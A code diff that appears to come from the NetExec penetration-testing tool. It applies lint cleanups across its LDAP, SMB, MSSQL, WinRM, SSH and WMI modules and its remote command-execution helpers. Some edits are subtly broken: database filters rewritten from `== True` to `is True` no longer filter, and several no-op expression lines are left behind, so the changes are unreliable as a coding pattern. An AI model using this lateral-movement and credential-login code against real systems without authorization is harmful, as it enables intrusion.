self.logger.debug(f"LDAPs connection to {ldap_url} failed - {e}")
# https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/enable-ldap-over-ssl-3rd-certification-authority
self.logger.debug(f"Even if the port is open, LDAPS may not be configured")
self.logger.debug("Even if the port is open, LDAPS may not be configured")
else:
self.logger.debug(f"LDAP connection to {ldap_url} failed: {e}")
return [None, None, None]
@ -207,7 +207,7 @@ class ldap(connection):
except Exception as e:
self.logger.debug("Exception:", exc_info=True)
self.logger.info(f"Skipping item, cannot process due to error {e}")
except OSError as e:
except OSError:
return [None, None, None]
self.logger.debug(f"Target: {target}; target_domain: {target_domain}; base_dn: {base_dn}")
return [target, target_domain, base_dn]
@ -634,12 +634,12 @@ class ldap(connection):
return False
def create_smbv1_conn(self):
self.logger.debug(f"Creating smbv1 connection object")
self.logger.debug("Creating smbv1 connection object")
try:
self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)
self.smbv1 = True
if self.conn:
self.logger.debug(f"SMBv1 Connection successful")
self.logger.debug("SMBv1 Connection successful")
except socket.error as e:
if str(e).find("Connection reset by peer") != -1:
self.logger.debug(f"SMBv1 might be disabled on {self.host}")
@ -650,12 +650,12 @@ class ldap(connection):
return True
def create_smbv3_conn(self):
self.logger.debug(f"Creating smbv3 connection object")
self.logger.debug("Creating smbv3 connection object")
try:
self.conn = SMBConnection(self.host, self.host, None, 445)
self.smbv1 = False
if self.conn:
self.logger.debug(f"SMBv3 Connection successful")
self.logger.debug("SMBv3 Connection successful")
except socket.error:
return False
except Exception as e:
@ -775,16 +775,12 @@ class ldap(connection):
resp = self.search(search_filter, attributes, sizeLimit=0)
if resp:
answers = []
self.logger.display(f"Total of records returned {len(resp):d}")
for item in resp:
if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
continue
sAMAccountName = ""
badPasswordTime = ""
badPwdCount = 0
description = ""
pwdLastSet = ""
try:
if self.username == "":
self.logger.highlight(f"{item['objectName']}")
@ -806,7 +802,6 @@ class ldap(connection):
attributes = ["name"]
resp = self.search(search_filter, attributes, 0)
if resp:
answers = []
self.logger.debug(f"Total of records returned {len(resp):d}")
for item in resp:
@ -835,15 +830,15 @@ class ldap(connection):
continue
name = ""
try:
for attribute in item["attributes"]:
if str(attribute["type"]) == "dNSHostName":
name = str(attribute["vals"][0])
try:
ip_address = socket.gethostbyname(name.split(".")[0])
if ip_address != True and name != "":
for attribute in item["attributes"]:
if str(attribute["type"]) == "dNSHostName":
name = str(attribute["vals"][0])
try:
ip_address = socket.gethostbyname(name.split(".")[0])
if ip_address != True and name != "":
self.logger.highlight(f"{name} = {colored(ip_address, host_info_colors[0])}")
except socket.gaierror:
self.logger.fail(f"{name} = Connection timeout")
except socket.gaierror:
self.logger.fail(f"{name} = Connection timeout")
except Exception as e:
self.logger.fail("Exception:", exc_info=True)
self.logger.fail(f"Skipping item, cannot process due to error {e}")
@ -1270,7 +1265,6 @@ class ldap(connection):
searchBase=self.baseDN,
)
if gmsa_accounts:
answers = []
self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}")
for item in gmsa_accounts:
@ -1320,7 +1314,6 @@ class ldap(connection):
searchBase=self.baseDN,
)
if gmsa_accounts:
answers = []
self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}")
for item in gmsa_accounts:
@ -1351,7 +1344,6 @@ class ldap(connection):
searchBase=self.baseDN,
)
if gmsa_accounts:
answers = []
self.logger.debug(f"Total of records returned {len(gmsa_accounts):d}")
for item in gmsa_accounts:

View File

@ -48,7 +48,7 @@ class database:
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
with self.db_engine.connect():
try:
self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine)
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)

View File

@ -71,7 +71,6 @@ class LDAPConnect:
useCache=False,
)
# Connect to LDAP
out = f"{domain}{username}:{password if password else ntlm_hash}"
self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "389"
return ldapConnection
@ -108,7 +107,7 @@ class LDAPConnect:
)
return False
except OSError as e:
except OSError:
self.logger.debug(f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}")
return False
except KerberosError as e:
@ -141,7 +140,6 @@ class LDAPConnect:
ldapConnection.login(username, password, domain, lmhash, nthash)
# Connect to LDAP
out = "{domain}\\{username}:{password if password else ntlm_hash}"
self.logger.extra["protocol"] = "LDAP"
self.logger.extra["port"] = "389"
# self.logger.success(out)
@ -172,7 +170,7 @@ class LDAPConnect:
)
return False
except OSError as e:
except OSError:
self.logger.debug(f"{domain}\\{username}:{password if password else ntlm_hash} {'Error connecting to the domain, please add option --kdcHost with the FQDN of the domain controller'}")
return False

View File

@ -1,13 +1,10 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
import os
from io import StringIO
from nxc.config import process_secret
from nxc.protocols.mssql.mssqlexec import MSSQLEXEC
from nxc.connection import *
from nxc.helpers.logger import highlight
from nxc.helpers.bloodhound import add_user_bh
from nxc.helpers.powershell import create_ps_command
from impacket import tds
@ -138,7 +135,7 @@ class mssql(connection):
if is_admin:
self.admin_privs = True
self.logger.debug(f"User is admin")
self.logger.debug("User is admin")
else:
return False
return True
@ -159,16 +156,14 @@ class mssql(connection):
pass
self.create_conn_obj()
nthash = ""
hashes = None
if ntlm_hash != "":
if ntlm_hash.find(":") != -1:
hashes = ntlm_hash
nthash = ntlm_hash.split(":")[1]
ntlm_hash.split(":")[1]
else:
# only nt hash
hashes = f":{ntlm_hash}"
nthash = ntlm_hash
if not all("" == s for s in [self.nthash, password, aesKey]):
kerb_pass = next(s for s in [self.nthash, password, aesKey] if s)
@ -244,8 +239,8 @@ class mssql(connection):
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except BrokenPipeError as e:
self.logger.fail(f"Broken Pipe Error while attempting to login")
except BrokenPipeError:
self.logger.fail("Broken Pipe Error while attempting to login")
return False
except Exception as e:
self.logger.fail(f"{domain}\\{username}:{process_secret(password)}")
@ -295,8 +290,8 @@ class mssql(connection):
if not self.args.local_auth:
add_user_bh(self.username, self.domain, self.logger, self.config)
return True
except BrokenPipeError as e:
self.logger.fail(f"Broken Pipe Error while attempting to login")
except BrokenPipeError:
self.logger.fail("Broken Pipe Error while attempting to login")
return False
except Exception as e:
self.logger.fail(f"{domain}\\{username}:{process_secret(ntlm_hash)} {e}")
@ -348,7 +343,7 @@ class mssql(connection):
if self.args.execute or self.args.ps_execute:
self.logger.success("Executed command via mssqlexec")
if self.args.no_output:
self.logger.debug(f"Output set to disabled")
self.logger.debug("Output set to disabled")
else:
for line in raw_output:
self.logger.highlight(line)

View File

@ -71,7 +71,7 @@ class database:
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
with self.db_engine.connect():
try:
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine)
@ -312,7 +312,7 @@ class database:
return [results]
# if we're filtering by domain controllers
elif filter_term == "dc":
q = q.filter(self.HostsTable.c.dc == True)
q = q.filter(self.HostsTable.c.dc is True)
if domain:
q = q.filter(func.lower(self.HostsTable.c.domain) == func.lower(domain))
# if we're filtering by ip/hostname

View File

@ -27,7 +27,7 @@ class MSSQLEXEC:
nxc_logger.error(f"Error when attempting to execute command via xp_cmdshell: {e}")
if output:
nxc_logger.debug(f"Output is enabled")
nxc_logger.debug("Output is enabled")
for row in command_output:
nxc_logger.debug(row)
# self.mssql_conn.printReplies()

View File

@ -175,7 +175,7 @@ class rdp(connection):
if str(proto) == "SUPP_PROTOCOLS.RDP" or str(proto) == "SUPP_PROTOCOLS.SSL" or str(proto) == "SUPP_PROTOCOLS.SSL|SUPP_PROTOCOLS.RDP":
self.nla = False
return
except Exception as e:
except Exception:
pass
async def connect_rdp(self):
@ -204,7 +204,7 @@ class rdp(connection):
else:
kerb_pass = ""
fqdn_host = self.hostname + "." + self.domain
self.hostname + "." + self.domain
password = password if password else nthash
if useCache:
@ -353,7 +353,7 @@ class rdp(connection):
try:
self.conn = RDPConnection(iosettings=self.iosettings, target=self.target, credentials=self.auth)
await self.connect_rdp()
except Exception as e:
except Exception:
return
await asyncio.sleep(int(5))

View File

@ -50,7 +50,7 @@ class database:
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
with self.db_engine.connect():
try:
self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine)
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)

View File

@ -27,7 +27,7 @@ from impacket.krb5.kerberosv5 import SessionKeyDecryptionError
from impacket.krb5.types import KerberosException
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, IWbemLevel1Login
from nxc.config import process_secret, host_info_colors
from nxc.connection import *
@ -214,7 +214,7 @@ class smb(connection):
try:
self.conn.login("", "")
except BrokenPipeError:
self.logger.fail(f"Broken Pipe Error while attempting to login")
self.logger.fail("Broken Pipe Error while attempting to login")
except Exception as e:
if "STATUS_NOT_SUPPORTED" in str(e):
# no ntlm supported
@ -515,8 +515,8 @@ class smb(connection):
except (ConnectionResetError, NetBIOSTimeout, NetBIOSError) as e:
self.logger.fail(f"Connection Error: {e}")
return False
except BrokenPipeError as e:
self.logger.fail(f"Broken Pipe Error while attempting to login")
except BrokenPipeError:
self.logger.fail("Broken Pipe Error while attempting to login")
return False
def hash_login(self, domain, username, ntlm_hash):
@ -581,8 +581,8 @@ class smb(connection):
except (ConnectionResetError, NetBIOSTimeout, NetBIOSError) as e:
self.logger.fail(f"Connection Error: {e}")
return False
except BrokenPipeError as e:
self.logger.fail(f"Broken Pipe Error while attempting to login")
except BrokenPipeError:
self.logger.fail("Broken Pipe Error while attempting to login")
return False
def create_smbv1_conn(self, kdc=""):
@ -651,7 +651,7 @@ class smb(connection):
try:
# 0xF003F - SC_MANAGER_ALL_ACCESS
# http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
ans = scmr.hROpenSCManagerW(dce, f"{self.host}\x00", "ServicesActive\x00", 0xF003F)
scmr.hROpenSCManagerW(dce, f"{self.host}\x00", "ServicesActive\x00", 0xF003F)
self.admin_privs = True
except scmr.DCERPCException:
self.admin_privs = False

View File

@ -195,7 +195,7 @@ class TSCH_EXEC:
except IOError:
sleep(2)
else:
peer = ":".join(map(str, self.__rpctransport.get_socket().getpeername()))
":".join(map(str, self.__rpctransport.get_socket().getpeername()))
smbConnection = self.__rpctransport.get_smb_connection()
tries = 1
while True:
@ -205,7 +205,7 @@ class TSCH_EXEC:
break
except Exception as e:
if tries >= self.__tries:
self.logger.fail(f"ATEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option '--get-output-tries'. If it is still failing, try the 'wmi' protocol or another exec method")
self.logger.fail("ATEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option '--get-output-tries'. If it is still failing, try the 'wmi' protocol or another exec method")
break
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
self.logger.fail(f"ATEXEC: Getting the output file failed - target has blocked access to the share: {self.__share} (but the command may have executed!)")

View File

@ -177,7 +177,7 @@ class database:
# )''')
def reflect_tables(self):
with self.db_engine.connect() as conn:
with self.db_engine.connect():
try:
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine)
@ -301,7 +301,7 @@ class database:
groups = []
if (group_id and not self.is_group_valid(group_id)) or (pillaged_from and not self.is_host_valid(pillaged_from)):
nxc_logger.debug(f"Invalid group or host")
nxc_logger.debug("Invalid group or host")
return
q = select(self.UsersTable).filter(
@ -499,18 +499,18 @@ class database:
return [results]
# if we're filtering by domain controllers
elif filter_term == "dc":
q = q.filter(self.HostsTable.c.dc == True)
q = q.filter(self.HostsTable.c.dc is True)
if domain:
q = q.filter(func.lower(self.HostsTable.c.domain) == func.lower(domain))
elif filter_term == "signing":
# generally we want hosts that are vulnerable, so signing disabled
q = q.filter(self.HostsTable.c.signing == False)
q = q.filter(self.HostsTable.c.signing is False)
elif filter_term == "spooler":
q = q.filter(self.HostsTable.c.spooler == True)
q = q.filter(self.HostsTable.c.spooler is True)
elif filter_term == "zerologon":
q = q.filter(self.HostsTable.c.zerologon == True)
q = q.filter(self.HostsTable.c.zerologon is True)
elif filter_term == "petitpotam":
q = q.filter(self.HostsTable.c.petitpotam == True)
q = q.filter(self.HostsTable.c.petitpotam is True)
elif filter_term is not None and filter_term.startswith("domain"):
domain = filter_term.split()[1]
like_term = func.lower(f"%{domain}%")
@ -700,7 +700,7 @@ class database:
"read": read,
"write": write,
}
share_id = self.conn.execute(
self.conn.execute(
Insert(self.SharesTable).on_conflict_do_nothing(), # .returning(self.SharesTable.c.id),
share_data,
) # .scalar_one()

View File

@ -252,7 +252,7 @@ class MMCEXEC:
break
except Exception as e:
if tries >= self.__tries:
self.logger.fail(f"MMCEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option '--get-output-tries'. If it is still failing, try the 'wmi' protocol or another exec method")
self.logger.fail("MMCEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option '--get-output-tries'. If it is still failing, try the 'wmi' protocol or another exec method")
break
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
self.logger.fail(f"MMCEXEC: Getting the output file failed - target has blocked access to the share: {self.__share} (but the command may have executed!)")

View File

@ -46,7 +46,7 @@ def convert(low, high, lockout=False):
minutes = int(strftime("%M", gmtime(tmp)))
hours = int(strftime("%H", gmtime(tmp)))
days = int(strftime("%j", gmtime(tmp))) - 1
except ValueError as e:
except ValueError:
return "[-] Invalid TIME"
if days > 1:

View File

@ -61,7 +61,7 @@ class SamrFunc:
domains = self.samr_query.get_domains()
if "Builtin" not in domains:
logging.error(f"No Builtin group to query locally on")
logging.error("No Builtin group to query locally on")
return
domain_handle = self.samr_query.get_domain_handle("Builtin")
@ -93,7 +93,7 @@ class SamrFunc:
if "Administrators" in self.groups:
self.logger.success(f"Found Local Administrators group: RID {self.groups['Administrators']}")
domain_handle = self.samr_query.get_domain_handle("Builtin")
self.logger.debug(f"Querying group members")
self.logger.debug("Querying group members")
member_sids = self.samr_query.get_alias_members(domain_handle, self.groups["Administrators"])
member_names = self.lsa_query.lookup_sids(member_sids)
@ -167,7 +167,7 @@ class SAMRQuery:
return None
return resp["ServerHandle"]
else:
nxc_logger.debug(f"Error creating Samr handle")
nxc_logger.debug("Error creating Samr handle")
return
def get_domains(self):

View File

@ -44,7 +44,7 @@ class UserSamrDump:
try:
protodef = UserSamrDump.KNOWN_PROTOCOLS[protocol]
port = protodef[1]
except KeyError as e:
except KeyError:
self.logger.debug(f"Invalid Protocol '{protocol}'")
self.logger.debug(f"Trying protocol {protocol}")
rpctransport = transport.SMBTransport(

View File

@ -47,11 +47,10 @@ class SMBSpider:
if share == "*":
self.logger.display("Enumerating shares for spidering")
permissions = []
try:
for share in self.smbconnection.listShares():
share_name = share["shi1_netname"][:-1]
share_remark = share["shi1_remark"][:-1]
share["shi1_remark"][:-1]
try:
self.smbconnection.listPath(share_name, "*")
self.share = share_name

View File

@ -6,7 +6,6 @@ import os
from time import sleep
from nxc.connection import dcom_FirewallChecker
from nxc.helpers.misc import gen_random_string
from impacket.dcerpc.v5 import transport
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom import wmi
from impacket.dcerpc.v5.dtypes import NULL
@ -166,7 +165,7 @@ class WMIEXEC:
break
except Exception as e:
if tries >= self.__tries:
self.logger.fail(f"WMIEXEC: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method")
self.logger.fail("WMIEXEC: Could not retrieve output file, it may have been detected by AV. If it is still failing, try the 'wmi' protocol or another exec method")
break
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
self.logger.fail(f"SMB connection: target has blocked {self.__share} access (maybe command executed!)")

View File

@ -71,12 +71,12 @@ class ssh(connection):
# but that might be too much of an opsec concern - maybe add in a flag to do more checks?
stdin, stdout, stderr = self.conn.exec_command("id")
if stdout.read().decode("utf-8").find("uid=0(root)") != -1:
self.logger.info(f"Determined user is root via `id` command")
self.logger.info("Determined user is root via `id` command")
self.admin_privs = True
return True
stdin, stdout, stderr = self.conn.exec_command("sudo -ln | grep 'NOPASSWD: ALL'")
if stdout.read().decode("utf-8").find("NOPASSWD: ALL") != -1:
self.logger.info(f"Determined user is root via `sudo -ln` command")
self.logger.info("Determined user is root via `sudo -ln` command")
self.admin_privs = True
return True
@ -88,7 +88,7 @@ class ssh(connection):
else:
pkey = paramiko.RSAKey.from_private_key_file(self.args.key_file)
self.logger.debug(f"Logging in with key")
self.logger.debug("Logging in with key")
self.conn.connect(
self.host,
port=self.args.port,
@ -115,7 +115,7 @@ class ssh(connection):
key=key_data,
)
else:
self.logger.debug(f"Logging in with password")
self.logger.debug("Logging in with password")
self.conn.connect(
self.host,
port=self.args.port,
@ -146,7 +146,7 @@ class ssh(connection):
stdin, stdout, stderr = self.conn.exec_command("id")
output = stdout.read().decode("utf-8")
if not output:
self.logger.debug(f"User cannot get a shell")
self.logger.debug("User cannot get a shell")
shell_access = False
else:
shell_access = True
@ -156,7 +156,7 @@ class ssh(connection):
if self.args.key_file:
password = f"{password} (keyfile: {self.args.key_file})"
display_shell_access = f" - shell access!" if shell_access else ""
display_shell_access = " - shell access!" if shell_access else ""
self.logger.success(f"{username}:{process_secret(password)} {self.mark_pwned()}{highlight(display_shell_access)}")
return True

View File

@ -56,7 +56,7 @@ class database:
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
with self.db_engine.connect():
try:
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine)

View File

@ -52,7 +52,7 @@ class winrm(connection):
try:
smb_conn.login("", "")
except BrokenPipeError:
self.logger.fail(f"Broken Pipe Error while attempting to login")
self.logger.fail("Broken Pipe Error while attempting to login")
except Exception as e:
if "STATUS_NOT_SUPPORTED" in str(e):
# no ntlm supported
@ -217,14 +217,13 @@ class winrm(connection):
self.logger.info(f"Connection Timed out to WinRM service: {e}")
except requests.exceptions.ConnectionError as e:
if "Max retries exceeded with url" in str(e):
self.logger.info(f"Connection Timeout to WinRM service (max retries exceeded)")
self.logger.info("Connection Timeout to WinRM service (max retries exceeded)")
else:
self.logger.info(f"Other ConnectionError to WinRM service: {e}")
return False
def plaintext_login(self, domain, username, password):
try:
from urllib3.connectionpool import log
# log.addFilter(SuppressFilter())
if not self.args.laps:
@ -253,7 +252,7 @@ class winrm(connection):
# self.db.add_loggedin_relation(user_id, host_id)
if self.admin_privs:
self.logger.debug(f"Inside admin privs")
self.logger.debug("Inside admin privs")
self.db.add_admin_user("plaintext", domain, self.username, self.password, self.host) # , user_id=user_id)
if not self.args.local_auth:

View File

@ -74,7 +74,7 @@ class database:
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
with self.db_engine.connect():
try:
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)
self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine)

View File

@ -15,7 +15,7 @@ from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5 import transport, epm
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_PKT_PRIVACY, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_GSS_NEGOTIATE, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, MSRPC_BIND, MSRPCBind, CtxItem, MSRPCHeader, SEC_TRAILER, MSRPCBindAck
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, IWbemLevel1Login
MSRPC_UUID_PORTMAP = uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA', '3.0'))
@ -261,7 +261,7 @@ class wmi(connection):
request['vers_option'] = 0x1
request['entry_handle'] = entry_handle
request['max_ents'] = 1
resp = dce.request(request)
dce.request(request)
except Exception as e:
dce.disconnect()
error_msg = str(e).lower()
@ -307,7 +307,7 @@ class wmi(connection):
request['vers_option'] = 0x1
request['entry_handle'] = entry_handle
request['max_ents'] = 1
resp = dce.request(request)
dce.request(request)
except Exception as e:
dce.disconnect()
error_msg = str(e).lower()
@ -362,7 +362,7 @@ class wmi(connection):
request['vers_option'] = 0x1
request['entry_handle'] = entry_handle
request['max_ents'] = 1
resp = dce.request(request)
dce.request(request)
except Exception as e:
dce.disconnect()
error_msg = str(e).lower()
@ -384,7 +384,6 @@ class wmi(connection):
# It's very complex to use wmi from rpctansport "convert" to dcom, so let we use dcom directly.
@requires_admin
def wmi(self, WQL=None, namespace=None):
results_WQL = "\r"
records = []
if not WQL:
WQL = self.args.wmi.strip('\n')

View File

@ -48,7 +48,7 @@ class database:
)
def reflect_tables(self):
with self.db_engine.connect() as conn:
with self.db_engine.connect():
try:
self.CredentialsTable = Table("credentials", self.metadata, autoload_with=self.db_engine)
self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine)

View File

@ -1,4 +1,3 @@
from argparse import _StoreTrueAction
def proto_args(parser, std_parser, module_parser):
wmi_parser = parser.add_parser('wmi', help="own stuff using WMI", parents=[std_parser, module_parser], conflict_handler='resolve')
@ -8,7 +7,7 @@ def proto_args(parser, std_parser, module_parser):
# For domain options
dgroup = wmi_parser.add_mutually_exclusive_group()
domain_arg = dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', default=None, type=str, help="Domain to authenticate to")
dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', default=None, type=str, help="Domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='Authenticate locally to each target')
egroup = wmi_parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating")

View File

@ -31,7 +31,7 @@ import base64
from nxc.helpers.misc import gen_random_string
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, IWbemLevel1Login
class WMIEXEC:
def __init__(self, host, username, password, domain, lmhash, nthash, doKerberos, kdcHost, aesKey, logger, exec_timeout, codec):
@ -103,8 +103,8 @@ class WMIEXEC:
descriptor = descriptor.SpawnInstance()
retVal = descriptor.GetStringValue(2147483650, self.__registry_Path, keyName)
self.__outputBuffer = base64.b64decode(retVal.sValue).decode(self.__codec, errors='replace').rstrip('\r\n')
except Exception as e:
self.logger.fail(f"WMIEXEC: Could not retrieve output file, it may have been detected by AV. Please try increasing the timeout with the '--exec-timeout' option. If it is still failing, try the 'smb' protocol or another exec method")
except Exception:
self.logger.fail("WMIEXEC: Could not retrieve output file, it may have been detected by AV. Please try increasing the timeout with the '--exec-timeout' option. If it is still failing, try the 'smb' protocol or another exec method")
try:
self.logger.debug(f"Removing temporary registry path: HKLM\\{self.__registry_Path}")

View File

@ -34,7 +34,7 @@ from nxc.helpers.powershell import get_ps_script
from impacket.dcerpc.v5.dtypes import NULL
from impacket.dcerpc.v5.dcomrt import DCOMConnection
from impacket.dcerpc.v5.dcom.wmi import WBEMSTATUS
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, WBEM_FLAG_FORWARD_ONLY, IWbemLevel1Login, WBEMSTATUS
from impacket.dcerpc.v5.dcom.wmi import CLSID_WbemLevel1Login, IID_IWbemLevel1Login, IWbemLevel1Login, WBEMSTATUS
class WMIEXEC_EVENT:
def __init__(self, host, username, password, domain, lmhash, nthash, doKerberos, kdcHost, aesKey, logger, exec_timeout, codec):
@ -189,8 +189,8 @@ class WMIEXEC_EVENT:
command_ResultObject, _ = self.__iWbemServices.GetObject(f'ActiveScriptEventConsumer.Name="{self.__instanceID_StoreResult}"')
record = dict(command_ResultObject.getProperties())
self.__outputBuffer = base64.b64decode(record['ScriptText']['value']).decode(self.__codec, errors='replace')
except Exception as e:
self.logger.fail(f"WMIEXEC-EVENT: Could not retrieve output file, it may have been detected by AV. Please try increasing the timeout with the '--exec-timeout' option. If it is still failing, try the 'smb' protocol or another exec method")
except Exception:
self.logger.fail("WMIEXEC-EVENT: Could not retrieve output file, it may have been detected by AV. Please try increasing the timeout with the '--exec-timeout' option. If it is still failing, try the 'smb' protocol or another exec method")
def remove_Instance(self):
if self.__retOutput:

View File

@ -5,7 +5,7 @@ from rich.console import Console
def get_cli_args():
parser = argparse.ArgumentParser(description=f"Script for running end to end tests for nxc")
parser = argparse.ArgumentParser(description="Script for running end to end tests for nxc")
parser.add_argument("-t", "--target", dest="target", required=True)
parser.add_argument("-u", "--user", "--username", dest="username", required=True)
parser.add_argument("-p", "--pass", "--password", dest="password", required=True)
@ -68,7 +68,7 @@ def run_e2e_tests(args):
)
version = result.communicate()[0].decode().strip()
with console.status(f"[bold green] :brain: Running {len(tasks)} test commands for nxc v{version}...") as status:
with console.status(f"[bold green] :brain: Running {len(tasks)} test commands for nxc v{version}..."):
passed = 0
failed = 0